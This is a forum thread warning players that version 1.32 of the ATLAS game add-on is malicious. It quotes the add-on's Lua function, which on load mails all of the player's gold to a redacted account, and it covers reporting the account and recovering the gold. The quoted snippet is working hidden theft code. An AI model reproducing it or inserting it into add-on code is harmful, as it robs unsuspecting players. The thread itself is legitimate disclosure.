Malicious code in latest ATLAS (1.32)

Sasky · 12/03/14, 09:48 PM

@Cairenn or moderators -- tried PM first, delete this thread if needed once action taken.

Until one of the admins can remove the file (at least), disable ATLAS or make sure it does not update to version 1.32.

The latest version of ATLAS has the following malicious code in it:

Lua Code:

function ATLAS:EVENT_PLAYER_ACTIVATED(...)
    d("|cFF2222ATLAS|r addon Loaded, /atlas for more info")
        RequestOpenMailbox()    
        QueueMoneyAttachment(GetCurrentMoney()) 
        SendMail("<REDACTED>", "..")    
    --
    -- Only once so unreg is from further events
    --
    EVENT_MANAGER:UnregisterForEvent( ATLAS.addonName, EVENT_PLAYER_ACTIVATED ) 
end

For those who don't understand LUA, when the game loads in, it sends a mail with all gold in your bag to a specific player.

I've submitted a ticket and talked to a GM to report the account the gold was sent to.

HyperToxic · 12/03/14, 10:05 PM

I updated this add-on before reading this and my gold is missing.

Sasky · 12/03/14, 10:14 PM

If you do lose your gold, disable the addon then contact a GM using the in-game 'Ask for Help'. Someone responded fairly quickly was able to restore the gold. Asked to logoff 5min or so to restore it and when logged back it in was there. The GM did indicate they were taking actions on their end -- whether banning or some form of bulk restore to everyone who sent mail to that person I don't know.

***Cairenn*** · 12/03/14, 10:46 PM

Yeah, I've already pulled it. Will be speaking with the 'author' shortly, just in the middle of something else right now.

TribeofOne · 12/03/14, 10:50 PM

Thank you for the warning. Hope all those whom this effected get help.

Now that we know this can happen how do we protect ourselves?

TribeofOne · 12/03/14, 10:53 PM

Originally Posted by Cairenn

Yeah, I've already pulled it. Will be speaking with the 'author' shortly, just in the middle of something else right now.

Cairenn the "unredacted" code is showing up in several comments on the ATLAS page. you may want to mod those or lock it. Id hate for someone else to take that code and add it to other addons and upload it.

rkuhnjr · 12/04/14, 12:53 AM

Im surprised its that easy to trigger a mail with all your gold via an addon, i mean its literally just three lines of code...

Thanks for the heads up.